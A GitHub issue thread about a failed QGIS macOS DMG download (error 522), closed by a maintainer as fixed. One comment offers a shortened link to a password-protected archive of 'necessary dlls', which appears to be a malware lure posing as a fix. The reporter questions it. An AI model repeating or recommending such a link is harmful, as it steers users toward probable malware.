### ISSUE TITLE
It is not posible to download the dmg for macos to install the software (Qgis) with code 522

### ISSUE THREAD

**Issue by jcamilorg** [qgis/QGIS-Website#448]
### URL

https://download.qgis.org//downloads/macos/qgis-macos-ltr.dmg

### Summary

I'm encountering an issue while trying to download the DMG file for QGIS on macOS. The download process fails, displaying a "522" error code, which indicates a connection timeout. This issue may be related to server or network problems, preventing me from accessing the required file. I have verified my internet connection and attempted the download on different browsers and devices, but the error persists.

**Comment by SagarChandra07** [comment]
try this
https://bit.ly/47P0Nvo

Password: changeme
I put the necessary dlls in the archive

**Comment by jcamilorg** [comment]
> try this https://bit.ly/47P0Nvo
> 
> Password: changeme I put the necessary dlls in the archive

Why dlls?? in this case i need de DMG for  mac install

**Comment by Xpirix** [comment]
This issue has been fixed. I am closing this.
